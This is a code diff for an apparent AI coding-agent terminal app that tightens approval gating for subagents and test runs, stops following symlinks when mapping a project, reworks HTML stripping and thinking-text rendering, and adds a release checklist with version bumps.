+fn child_runtime_increments_depth_and_preserves_auto_approve() {
     let mut parent = stub_runtime();
     parent.spawn_depth = 1;
     parent.context.auto_approve = false; // parent in suggest mode
     let child = parent.child_runtime();
     assert_eq!(child.spawn_depth, 2, "child depth = parent + 1");
     assert!(
-        child.context.auto_approve,
-        "child must auto-approve regardless of parent mode (spawning IS the approval)"
+        !child.context.auto_approve,
+        "child must inherit parent approval state"
     );
-    // Parent mode is unchanged — the override is on the child only.
     assert!(!parent.context.auto_approve);
+
+    parent.context.auto_approve = true;
+    let auto_child = parent.child_runtime();
+    assert!(
+        auto_child.context.auto_approve,
+        "auto-approved parents should still create auto-approved children"
+    );
+}
+
+#[tokio::test]
+async fn subagent_registry_blocks_approval_tools_without_parent_auto_approve() {
+    let mut runtime = stub_runtime();
+    runtime.context.auto_approve = false;
+    let registry = SubAgentToolRegistry::new(
+        runtime,
+        Some(vec!["exec_shell".to_string()]),
+        Arc::new(Mutex::new(TodoList::new())),
+        Arc::new(Mutex::new(PlanState::default())),
+    );
+
+    let err = registry
+        .execute("agent_test", "exec_shell", json!({"command": "echo hi"}))
+        .await
+        .expect_err("approval-gated child tool should be blocked");
+
+    assert!(
+        err.to_string().contains("requires approval"),
+        "unexpected error: {err}"
+    );
 }
 
 #[test]

--- a/crates/tui/src/tools/test_runner.rs
+++ b/crates/tui/src/tools/test_runner.rs
@@ -1,7 +1,7 @@
 //! Cargo test runner tool: `run_tests`.
 //!
-//! This tool intentionally auto-approves test execution to encourage
-//! frequent verification loops while still scoping execution to the workspace.
+//! `cargo test` runs workspace code, so this tool follows the same explicit
+//! approval policy as the other code-executing tools.
 
 use std::path::Path;
 use std::process::Command;
@@ -61,8 +61,9 @@ impl ToolSpec for RunTestsTool {
     }
 
     fn approval_requirement(&self) -> ApprovalRequirement {
-        // Tests are encouraged, so avoid gating them behind approval.
-        ApprovalRequirement::Auto
+        // `run_tests` declares `ToolCapability::ExecutesCode` — match the
+        // default approval policy for code-executing tools.
+        ApprovalRequirement::Required
     }
 
     async fn execute(&self, input: Value, context: &ToolContext) -> Result<ToolResult, ToolError> {
@@ -189,6 +190,18 @@ mod tests {
             .expect("cargo should spawn");
         assert!(status.success(), "cargo init failed");
         project_dir
+    }
+
+    /// `run_tests` is `ToolCapability::ExecutesCode`, so it must follow the
+    /// explicit-approval policy that applies to other code-executing tools.
+    #[test]
+    fn run_tests_requires_user_approval() {
+        let tool = RunTestsTool;
+        assert_eq!(
+            tool.approval_requirement(),
+            ApprovalRequirement::Required,
+            "run_tests must gate cargo test behind user approval"
+        );
     }
 
     #[tokio::test]

--- a/crates/tui/src/tui/app.rs
+++ b/crates/tui/src/tui/app.rs
@@ -724,6 +724,7 @@ pub struct App {
     #[allow(dead_code)]
     pub fancy_animations: bool,
     pub show_thinking: bool,
+    pub verbose_transcript: bool,
     pub show_tool_details: bool,
     pub ui_locale: Locale,
     pub cost_currency: CostCurrency,
@@ -1308,6 +1309,7 @@ impl App {
             low_motion,
             fancy_animations,
             show_thinking,
+            verbose_transcript: false,
             show_tool_details,
             ui_locale,
             cost_currency,
@@ -2438,6 +2440,7 @@ impl App {
     pub fn transcript_render_options(&self) -> TranscriptRenderOptions {
         TranscriptRenderOptions {
             show_thinking: self.show_thinking,
+            verbose: self.verbose_transcript,
             show_tool_details: self.show_tool_details,
             calm_mode: self.calm_mode,
             low_motion: self.low_motion,

--- a/crates/tui/src/tui/color_compat.rs
+++ b/crates/tui/src/tui/color_compat.rs
@@ -62,6 +62,8 @@ impl<W: Write> Write for ColorCompatBackend<W> {
 }
 
 impl<W: Write> Backend for ColorCompatBackend<W> {
+    type Error = io::Error;
+
     fn draw<'a, I>(&mut self, content: I) -> io::Result<()>
     where
         I: Iterator<Item = (u16, u16, &'a Cell)>,

--- a/crates/tui/src/tui/command_palette.rs
+++ b/crates/tui/src/tui/command_palette.rs
@@ -6,7 +6,6 @@ use crossterm::event::{KeyCode, KeyEvent, KeyModifiers};
 use ratatui::{
     buffer::Buffer,
     layout::Rect,
-    prelude::Stylize,
     style::{Modifier, Style},
     text::{Line, Span},
     widgets::{Block, Borders, Clear, Padding, Paragraph, Widget, Wrap},

--- a/crates/tui/src/tui/file_picker.rs
+++ b/crates/tui/src/tui/file_picker.rs
@@ -17,7 +17,6 @@ use ignore::WalkBuilder;
 use ratatui::{
     buffer::Buffer,
     layout::Rect,
-    prelude::Stylize,
     style::{Modifier, Style},
     text::{Line, Span},
     widgets::{Block, Borders, Clear, Padding, Paragraph, Widget},

--- a/crates/tui/src/tui/file_tree.rs
+++ b/crates/tui/src/tui/file_tree.rs
@@ -11,7 +11,7 @@ use std::sync::{Arc, Mutex};
 use ratatui::{
     Frame,
     layout::Rect,
-    style::{Style, Stylize},
+    style::Style,
     text::{Line, Span},
     widgets::{Block, Paragraph, Wrap},
 };

--- a/crates/tui/src/tui/history.rs
+++ b/crates/tui/src/tui/history.rs
@@ -3,7 +3,7 @@
 use std::path::{Path, PathBuf};
 use std::time::Instant;
 
-use ratatui::style::{Color, Modifier, Style, Stylize};
+use ratatui::style::{Color, Modifier, Style};
 use ratatui::text::{Line, Span};
 use serde_json::Value;
 use unicode_width::UnicodeWidthStr;
@@ -149,6 +149,7 @@ impl SubAgentCell {
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 pub struct TranscriptRenderOptions {
     pub show_thinking: bool,
+    pub verbose: bool,
     pub show_tool_details: bool,
     pub calm_mode: bool,
     pub low_motion: bool,
@@ -159,6 +160,7 @@ impl Default for TranscriptRenderOptions {
     fn default() -> Self {
         Self {
             show_thinking: true,
+            verbose: false,
             show_tool_details: true,
             calm_mode: false,
             low_motion: false,
@@ -239,7 +241,7 @@ impl HistoryCell {
                 width,
                 *streaming,
                 *duration_secs,
-                !*streaming,
+                !options.verbose,
                 options.low_motion,
             ),
             HistoryCell::Tool(cell) if !options.show_tool_details => {
@@ -2081,12 +2083,18 @@ fn render_thinking(
     lines.push(Line::from(header_spans));
 
     let content_width = width.saturating_sub(3).max(1);
-    let body_text = if collapsed {
+    let body_text = if collapsed && streaming {
+        String::new()
+    } else if collapsed {
         extract_reasoning_summary(content).unwrap_or_else(|| content.trim().to_string())
     } else {
         content.to_string()
     };
-    let mut rendered = markdown_render::render_markdown(&body_text, content_width, body_style);
+    let mut rendered = if body_text.trim().is_empty() {
+        Vec::new()
+    } else {
+        markdown_render::render_markdown(&body_text, content_width, body_style)
+    };
     let mut truncated = false;
     if collapsed && rendered.len() > THINKING_SUMMARY_LINE_LIMIT {
         rendered.truncate(THINKING_SUMMARY_LINE_LIMIT);
@@ -2098,10 +2106,7 @@ fn render_thinking(
 
     if rendered.is_empty() && streaming {
         let mut spans = vec![Span::styled(REASONING_RAIL.to_string(), rail_style)];
-        spans.push(Span::styled(
-            "reasoning in progress...",
-            body_style.italic(),
-        ));
+        spans.push(Span::styled("thinking...", body_style.italic()));
         if !low_motion {
             spans.push(Span::styled(format!(" {REASONING_CURSOR}"), cursor_style));
         }
@@ -3908,6 +3913,38 @@ mod tests {
             !visible.contains(REASONING_CURSOR),
             "low_motion must suppress the streaming cursor: {visible:?}"
         );
+    }
+
+    #[test]
+    fn streaming_thinking_live_collapses_unless_verbose() {
+        let cell = HistoryCell::Thinking {
+            content: "private step one\nprivate step two".to_string(),
+            streaming: true,
+            duration_secs: None,
+        };
+
+        let compact = cell.lines_with_options(
+            80,
+            TranscriptRenderOptions {
+                low_motion: true,
+                ..TranscriptRenderOptions::default()
+            },
+        );
+        let compact_text = lines_text(&compact);
+        assert!(compact_text.contains("thinking..."));
+        assert!(!compact_text.contains("private step one"));
+
+        let verbose = cell.lines_with_options(
+            80,
+            TranscriptRenderOptions {
+                verbose: true,
+                low_motion: true,
+                ..TranscriptRenderOptions::default()
+            },
+        );
+        let verbose_text = lines_text(&verbose);
+        assert!(verbose_text.contains("private step one"));
+        assert!(verbose_text.contains("private step two"));
     }
 
     // === Theme parity tests ===

--- a/crates/tui/src/tui/model_picker.rs
+++ b/crates/tui/src/tui/model_picker.rs
@@ -21,7 +21,6 @@ use crossterm::event::{KeyCode, KeyEvent};
 use ratatui::{
     buffer::Buffer,
     layout::{Constraint, Direction, Layout, Rect},
-    prelude::Stylize,
     style::{Modifier, Style},
     text::{Line, Span},
     widgets::{Block, Borders, Clear, Paragraph, Widget},

--- a/crates/tui/src/tui/sidebar.rs
+++ b/crates/tui/src/tui/sidebar.rs
@@ -10,7 +10,7 @@ use ratatui::{
     Frame,
     layout::{Constraint, Direction, Layout, Rect},
     prelude::Widget,
-    style::{Style, Stylize},
+    style::Style,
     text::{Line, Span},
     widgets::{Block, Paragraph, Wrap},
 };

--- a/crates/tui/src/tui/ui.rs
+++ b/crates/tui/src/tui/ui.rs
@@ -442,9 +442,7 @@ fn format_resume_hint(session_id: Option<&str>) -> Option<String> {
     if session_id.is_empty() {
         return None;
     }
-    Some(format!(
-        "To continue this session, run deepseek resume {session_id}"
-    ))
+    Some("To continue this session, run deepseek --continue".to_string())
 }
 
 fn terminal_probe_timeout(config: &Config) -> Duration {

--- a/crates/tui/src/tui/ui/tests.rs
+++ b/crates/tui/src/tui/ui/tests.rs
@@ -20,10 +20,7 @@ use tempfile::TempDir;
 fn format_resume_hint_uses_canonical_resume_command() {
     assert_eq!(
         format_resume_hint(Some("019dd9d6-4f44-7c83-9863-59674a12b827")),
-        Some(
-            "To continue this session, run deepseek resume 019dd9d6-4f44-7c83-9863-59674a12b827"
-                .to_string()
-        )
+        Some("To continue this session, run deepseek --continue".to_string())
     );
 }
 

--- a/crates/tui/src/tui/views/mod.rs
+++ b/crates/tui/src/tui/views/mod.rs
@@ -401,7 +401,6 @@ impl ModalView for ShellControlView {
 
     fn render(&self, area: Rect, buf: &mut Buffer) {
         use ratatui::{
-            prelude::Stylize,
             style::Style,
             text::{Line, Span},
             widgets::{Block, Borders, Clear, Padding, Paragraph, Widget},
@@ -1028,7 +1027,6 @@ fn config_hint_for_key(key: &str) -> &'static str {
 
 fn render_config_editor_value_line(edit: &ConfigEdit) -> ratatui::text::Line<'static> {
     use ratatui::{
-        prelude::Stylize,
         style::Style,
         text::{Line, Span},
     };
@@ -1185,7 +1183,6 @@ impl ModalView for ConfigView {
 
     fn render(&self, area: Rect, buf: &mut Buffer) {
         use ratatui::{
-            prelude::Stylize,
             style::Style,
             text::{Line, Span},
             widgets::{Block, Borders, Clear, Padding, Paragraph, Widget},
@@ -1539,7 +1536,6 @@ impl ModalView for SubAgentsView {
 
     fn render(&self, area: Rect, buf: &mut Buffer) {
         use ratatui::{
-            prelude::Stylize,
             style::Style,
             text::{Line, Span},
             widgets::{Block, Borders, Clear, Padding, Paragraph, Widget},
@@ -1716,7 +1712,6 @@ fn append_subagent_group(
     content_width: usize,
 ) {
     use ratatui::{
-        prelude::Stylize,
         style::Style,
         text::{Line, Span},
     };

--- a/crates/tui/src/tui/widgets/key_hint.rs
+++ b/crates/tui/src/tui/widgets/key_hint.rs
@@ -25,10 +25,7 @@
 use std::fmt;
 
 use crossterm::event::{KeyCode, KeyEvent, KeyEventKind, KeyModifiers};
-use ratatui::{
-    style::{Style, Stylize},
-    text::Span,
-};
+use ratatui::{style::Style, text::Span};
 
 // Compile-time platform detection. The `#[cfg(test)]` arm forces the macOS
 // rendering during `cargo test` so unit tests are deterministic regardless of

--- a/crates/tui/src/tui/widgets/mod.rs
+++ b/crates/tui/src/tui/widgets/mod.rs
@@ -34,7 +34,6 @@ use crate::{commands, config::COMMON_DEEPSEEK_MODELS};
 use ratatui::{
     buffer::Buffer,
     layout::Rect,
-    prelude::Stylize,
     style::{Color, Modifier, Style},
     text::{Line, Span},
     widgets::{

--- a/crates/tui/src/utils.rs
+++ b/crates/tui/src/utils.rs
@@ -51,7 +51,7 @@ pub fn summarize_project(root: &Path) -> String {
     let mut key_files = Vec::new();
 
     let mut builder = WalkBuilder::new(root);
-    builder.hidden(false).follow_links(true).max_depth(Some(2));
+    builder.hidden(false).follow_links(false).max_depth(Some(2));
     let walker = builder.build();
 
     for entry in walker {
@@ -59,6 +59,9 @@ pub fn summarize_project(root: &Path) -> String {
             Ok(entry) => entry,
             Err(_) => continue,
         };
+        if entry.file_type().is_some_and(|ft| ft.is_symlink()) {
+            continue;
+        }
         if is_key_file(entry.path())
             && let Ok(rel) = entry.path().strip_prefix(root)
         {
@@ -113,10 +116,13 @@ pub fn project_tree(root: &Path, max_depth: usize) -> String {
     let mut builder = WalkBuilder::new(root);
     builder
         .hidden(false)
-        .follow_links(true)
+        .follow_links(false)
         .max_depth(Some(max_depth + 1));
 
     for entry in builder.build().flatten() {
+        if entry.file_type().is_some_and(|ft| ft.is_symlink()) {
+            continue;
+        }
         let depth = entry.depth();
         if depth == 0 || depth > max_depth {
             continue;
@@ -714,6 +720,22 @@ mod project_mapping_tests {
         fs::write(root.join("a.txt"), "a").expect("write");
 
         assert_eq!(project_tree(root, 1), project_tree(root, 1));
+    }
+
+    #[test]
+    #[cfg(unix)]
+    fn project_mapping_does_not_follow_symlinked_key_files() {
+        let tmp = tempdir().expect("tempdir");
+        let root = tmp.path().join("workspace");
+        let outside = tmp.path().join("outside");
+        fs::create_dir_all(&root).expect("mkdir workspace");
+        fs::create_dir_all(&outside).expect("mkdir outside");
+        let outside_file = outside.join("Cargo.toml");
+        fs::write(&outside_file, "[package]\nname = \"outside\"\n").expect("write outside");
+        std::os::unix::fs::symlink(&outside_file, root.join("Cargo.toml")).expect("symlink");
+
+        assert_eq!(summarize_project(&root), "Unknown project type");
+        assert!(!project_tree(&root, 1).contains("Cargo.toml"));
     }
 
     #[test]

--- a/docs/RELEASE_CHECKLIST.md
+++ b/docs/RELEASE_CHECKLIST.md
@@ -1,0 +1,103 @@
+# Release Checklist
+
+A pre-tag checklist that the v0.8.21/v0.8.22 CHANGELOG gap proved we needed.
+Step through this in order from a clean worktree on the release branch
+(`work/vX.Y.Z-...`). Treat any unchecked box as a release blocker.
+
+For deeper context on the underlying tools (preflight scripts, npm smoke,
+publish-crates), see [`RELEASE_RUNBOOK.md`](RELEASE_RUNBOOK.md).
+
+## 1. CHANGELOG entry exists for the version
+
+- [ ] `CHANGELOG.md` has a `## [X.Y.Z] - YYYY-MM-DD` heading at the top
+- [ ] The entry credits every external contributor whose commit lands in this
+      version. Get the list with:
+      ```
+      git log vPREV..HEAD --no-merges --format="%h %an <%ae> %s" \
+        | grep -v '<your-email@…>'
+      ```
+      For each contributor, link both their display name and (when known)
+      `@github-handle`.
+- [ ] The entry uses the Keep a Changelog headers — `Added`, `Changed`,
+      `Fixed`, `Security`, `Removed`, `Deprecated`. Add `Known issues` only
+      if there is something material the user must work around.
+- [ ] The entry mentions all referenced issue/PR numbers as `#NNNN` so the
+      auto-linker on GitHub picks them up.
+
+## 2. Version pins are in sync
+
+- [ ] `Cargo.toml` workspace `version` is bumped.
+- [ ] All per-crate `crates/*/Cargo.toml` path-dependency `version = "..."`
+      pins match the new workspace version.
+- [ ] `npm/deepseek-tui/package.json` `version` AND `deepseekBinaryVersion`
+      are both bumped.
+- [ ] `Cargo.lock` is refreshed (`cargo update --workspace --offline`).
+- [ ] `./scripts/release/check-versions.sh` reports
+      `Version state OK: workspace=X.Y.Z, npm=X.Y.Z, lockfile in sync.`
+
+## 3. Preflight gates
+
+Run, in order, from the repo root:
+
+- [ ] `cargo fmt --all -- --check`
+- [ ] `cargo check --workspace --all-targets --locked`
+- [ ] `cargo clippy --workspace --all-targets --all-features --locked -- -D warnings`
+- [ ] `cargo test --workspace --all-features --locked`
+      (Re-run any single failure in isolation with
+      `cargo test -p PKG --bin BIN -- TEST_NAME` before declaring it a flake.
+      Tests that mutate process-wide state — `HOME`, `cwd`, `RUST_LOG` —
+      can race in parallel. Document confirmed flakes in `Known issues`.)
+- [ ] `./scripts/release/publish-crates.sh dry-run`
+
+## 4. npm wrapper smoke
+
+- [ ] `cargo build --release --locked -p deepseek-tui-cli -p deepseek-tui`
+- [ ] `node scripts/release/npm-wrapper-smoke.js`
+      (Set `DEEPSEEK_TUI_KEEP_SMOKE_DIR=1` if you need to inspect the temp
+      install afterwards.)
+
+## 5. Branch and PR
+
+- [ ] Branch is pushed: `git push -u origin work/vX.Y.Z-...`
+- [ ] PR opened with `gh pr create --base main --title "chore(release): prepare vX.Y.Z"`
+- [ ] PR body includes:
+  - one-paragraph summary of the release theme
+  - a punch list of the new commits since the last release
+  - explicit call-out of any **Security** items so reviewers see them
+  - the contributor thank-you list
+  - the `Known issues` block from the CHANGELOG, if any
+- [ ] PR title is **neutral** — do not put CVE-style language or specific
+      attack details in the title. Save those for the GitHub release notes
+      after the tag is pushed.
+
+## 6. CI green and review
+
+- [ ] All required CI jobs are green. The `versions` job should mirror the
+      preflight `check-versions.sh` and is your last line of defense.
+- [ ] PR has been reviewed.
+
+## 7. Tag and release (after review)
+
+- [ ] `git tag -s vX.Y.Z -m "vX.Y.Z"`
+- [ ] `git push origin vX.Y.Z`
+- [ ] The `release.yml` workflow has built and uploaded artifacts to the
+      GitHub release for this tag.
+- [ ] `npm view deepseek-tui@X.Y.Z version deepseekBinaryVersion --json`
+      reports the new version on the npm registry.
+- [ ] `crates.io` has the new version (or the `publish-crates.sh` job has
+      pushed it).
+- [ ] `ghcr.io/hmbown/deepseek-tui:vX.Y.Z` and `:latest` are updated.
+
+## 8. Post-tag
+
+- [ ] Edit the GitHub release notes to expand any CVE-style or attack
+      details that were intentionally omitted from the PR title/body.
+- [ ] Note any deferred items in the next release's tracking issue.
+- [ ] Close any issues that this release fixed.
+
+---
+
+If a step fails, **fix the underlying cause** rather than skipping it. Pre-commit
+hooks, signing, and CI are all here to catch real problems. `--no-verify`,
+`--no-gpg-sign`, and force-pushing a release branch over reviewers should
+remain hard-disabled by convention.

--- a/npm/deepseek-tui/package.json
+++ b/npm/deepseek-tui/package.json
@@ -1,7 +1,7 @@
 {
   "name": "deepseek-tui",
-  "version": "0.8.22",
-  "deepseekBinaryVersion": "0.8.22",
+  "version": "0.8.23",
+  "deepseekBinaryVersion": "0.8.23",
   "description": "Install and run deepseek and deepseek-tui binaries from GitHub release artifacts.",
   "author": "Hmbown",
   "license": "MIT",

--- a/web/lib/content-watch.ts
+++ b/web/lib/content-watch.ts
@@ -137,6 +137,75 @@ If nothing is drifted, return { "drifts": [] }.
 
 ${VOICE_CONSTRAINTS}`;
 
+function startsWithAsciiCI(input: string, index: number, needle: string): boolean {
+  if (index + needle.length > input.length) return false;
+  return input.slice(index, index + needle.length).toLowerCase() === needle;
+}
+
+function isWhitespace(c: string | undefined): boolean {
+  return c === " " || c === "\n" || c === "\r" || c === "\t" || c === "\f";
+}
+
+function tagNameBoundary(input: string, index: number): boolean {
+  const c = input[index];
+  return c === undefined || c === ">" || c === "/" || isWhitespace(c);
+}
+
+function findClosingRawTextTag(input: string, from: number, tagName: "script" | "style"): number {
+  const closePrefix = `</${tagName}`;
+  for (let i = from; i < input.length; i += 1) {
+    if (startsWithAsciiCI(input, i, closePrefix) && tagNameBoundary(input, i + closePrefix.length)) {
+      const close = input.indexOf(">", i + closePrefix.length);
+      return close === -1 ? input.length : close + 1;
+    }
+  }
+  return input.length;
+}
+
+function collapseWhitespace(input: string): string {
+  let out = "";
+  let pendingSpace = false;
+  for (const c of input) {
+    if (isWhitespace(c)) {
+      pendingSpace = out.length > 0;
+      continue;
+    }
+    if (pendingSpace) out += " ";
+    out += c;
+    pendingSpace = false;
+  }
+  return out.trim();
+}
+
+function stripHtmlForPrompt(input: string): string {
+  let out = "";
+  for (let i = 0; i < input.length;) {
+    if (input[i] !== "<") {
+      out += input[i];
+      i += 1;
+      continue;
+    }
+
+    if (startsWithAsciiCI(input, i, "<script") && tagNameBoundary(input, i + "<script".length)) {
+      out += " ";
+      const openEnd = input.indexOf(">", i + 1);
+      i = openEnd === -1 ? input.length : findClosingRawTextTag(input, openEnd + 1, "script");
+      continue;
+    }
+    if (startsWithAsciiCI(input, i, "<style") && tagNameBoundary(input, i + "<style".length)) {
+      out += " ";
+      const openEnd = input.indexOf(">", i + 1);
+      i = openEnd === -1 ? input.length : findClosingRawTextTag(input, openEnd + 1, "style");
+      continue;
+    }
+
+    out += " ";
+    const tagEnd = input.indexOf(">", i + 1);
+    i = tagEnd === -1 ? input.length : tagEnd + 1;
+  }
+  return collapseWhitespace(out).slice(0, 8000);
+}
+
 export async function runSemanticDrift(env: WatchEnv): Promise<{ ok: boolean; drafted: number; reason?: string }> {
   if (!env.CURATED_KV || !env.DEEPSEEK_API_KEY) {
     return { ok: false, drafted: 0, reason: "missing CURATED_KV or DEEPSEEK_API_KEY" };
@@ -160,11 +229,8 @@ export async function runSemanticDrift(env: WatchEnv): Promise<{ ok: boolean; dr
     return { ok: false, drafted: 0, reason: "no changelog or commits available" };
   }
 
-  // Strip HTML tags + collapse whitespace to keep prompt size tractable.
-  const stripHtml = (h: string) => h.replace(/<script[\s\S]*?<\/script>/g, "").replace(/<style[\s\S]*?<\/style>/g, "").replace(/<[^>]+>/g, " ").replace(/\s+/g, " ").trim().slice(0, 8000);
-
-  const homepageText = stripHtml(homepageHtml);
-  const docsText = stripHtml(docsHtml);
+  const homepageText = stripHtmlForPrompt(homepageHtml);
+  const docsText = stripHtmlForPrompt(docsHtml);
   const changelogHead = changelog.slice(0, 4000);
   const commitMsgs = commits.slice(0, 30).map((c) => `- ${c.sha.slice(0, 7)}: ${c.commit.message.split("\n")[0]}`).join("\n");
 

--- a/web/lib/facts.generated.ts
+++ b/web/lib/facts.generated.ts
@@ -18,8 +18,8 @@ export interface RepoFacts {
 }
 
 export const FACTS: RepoFacts = {
-  "generatedAt": "2026-05-08T02:25:40.439Z",
-  "version": "0.8.18",
+  "generatedAt": "2026-05-08T19:10:07.269Z",
+  "version": "0.8.22",
   "crates": [
     "agent",
     "app-server",

--- a/web/package-lock.json
+++ b/web/package-lock.json
@@ -21,7 +21,7 @@
         "autoprefixer": "^10.4.20",
         "eslint": "^9.39.4",
         "eslint-config-next": "^15.5.16",
-        "postcss": "^8.5.1",
+        "postcss": "^8.5.14",
         "tailwindcss": "^3.4.17",
         "typescript": "^5.7.3",
         "wrangler": "^4.86.0"
@@ -116,9 +116,6 @@
         "arm64"
       ],
       "dev": true,
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -136,9 +133,6 @@
         "arm64"
       ],
       "dev": true,
-      "libc": [
-        "musl"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -156,9 +150,6 @@
         "x64"
       ],
       "dev": true,
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -176,9 +167,6 @@
         "x64"
       ],
       "dev": true,
-      "libc": [
-        "musl"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -1711,6 +1699,7 @@
       "version": "1.10.0",
       "resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz",
       "integrity": "sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==",
+      "dev": true,
       "license": "MIT",
       "optional": true,
       "dependencies": {
@@ -2476,6 +2465,7 @@
       "cpu": [
         "arm64"
       ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2498,6 +2488,7 @@
       "cpu": [
         "x64"
       ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2520,6 +2511,7 @@
       "cpu": [
         "arm64"
       ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2536,6 +2528,7 @@
       "cpu": [
         "x64"
       ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2552,9 +2545,7 @@
       "cpu": [
         "arm"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2571,9 +2562,7 @@
       "cpu": [
         "arm64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2590,9 +2579,7 @@
       "cpu": [
         "ppc64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2609,9 +2596,7 @@
       "cpu": [
         "riscv64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2628,9 +2613,7 @@
       "cpu": [
         "s390x"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2647,9 +2630,7 @@
       "cpu": [
         "x64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2666,9 +2647,7 @@
       "cpu": [
         "arm64"
       ],
-      "libc": [
-        "musl"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2685,9 +2664,7 @@
       "cpu": [
         "x64"
       ],
-      "libc": [
-        "musl"
-      ],
+      "dev": true,
       "license": "LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2704,9 +2681,7 @@
       "cpu": [
         "arm"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2729,9 +2704,7 @@
       "cpu": [
         "arm64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2754,9 +2727,7 @@
       "cpu": [
         "ppc64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2779,9 +2750,7 @@
       "cpu": [
         "riscv64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2804,9 +2773,7 @@
       "cpu": [
         "s390x"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2829,9 +2796,7 @@
       "cpu": [
         "x64"
       ],
-      "libc": [
-        "glibc"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2854,9 +2819,7 @@
       "cpu": [
         "arm64"
       ],
-      "libc": [
-        "musl"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2879,9 +2842,7 @@
       "cpu": [
         "x64"
       ],
-      "libc": [
-        "musl"
-      ],
+      "dev": true,
       "license": "Apache-2.0",
       "optional": true,
       "os": [
@@ -2904,6 +2865,7 @@
       "cpu": [
         "wasm32"
       ],
+      "dev": true,
       "license": "Apache-2.0 AND LGPL-3.0-or-later AND MIT",
       "optional": true,
       "dependencies": {
@@ -2923,6 +2885,7 @@
       "cpu": [
         "arm64"
       ],
+      "dev": true,
       "license": "Apache-2.0 AND LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2942,6 +2905,7 @@
       "cpu": [
         "ia32"
       ],
+      "dev": true,
       "license": "Apache-2.0 AND LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -2961,6 +2925,7 @@
       "cpu": [
         "x64"
       ],
+      "dev": true,
       "license": "Apache-2.0 AND LGPL-3.0-or-later",
       "optional": true,
       "os": [
@@ -3140,9 +3105,6 @@
       "cpu": [
         "arm64"
       ],
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -3158,9 +3120,6 @@
       "integrity": "sha512-Zf0BIqv/o5uOWfyRkzgGhyV2Tky7HLt0bG+w7XWdaU1JpyX0tltM3TrSfa/Y9c597SJG4CzN47+u2InhgZZ4vg==",
       "cpu": [
         "arm64"
-      ],
-      "libc": [
-        "musl"
       ],
       "license": "MIT",
       "optional": true,
@@ -3178,9 +3137,6 @@
       "cpu": [
         "x64"
       ],
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -3196,9 +3152,6 @@
       "integrity": "sha512-kvXUY1dn5wxKuMkXxQRUbPjEnKxW1PR9uKOm0zpIpj3574+cFfaePhYFmBVtrOuwt+w34OdDzNaJr5Iixf+HBQ==",
       "cpu": [
         "x64"
-      ],
-      "libc": [
-        "musl"
       ],
       "license": "MIT",
       "optional": true,
@@ -5077,9 +5030,6 @@
         "arm64"
       ],
       "dev": true,
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -5094,9 +5044,6 @@
         "arm64"
       ],
       "dev": true,
-      "libc": [
-        "musl"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -5111,9 +5058,6 @@
         "ppc64"
       ],
       "dev": true,
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -5128,9 +5072,6 @@
         "riscv64"
       ],
       "dev": true,
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -5145,9 +5086,6 @@
         "riscv64"
       ],
       "dev": true,
-      "libc": [
-        "musl"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -5162,9 +5100,6 @@
         "s390x"
       ],
       "dev": true,
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -5179,9 +5114,6 @@
         "x64"
       ],
       "dev": true,
-      "libc": [
-        "glibc"
-      ],
       "license": "MIT",
       "optional": true,
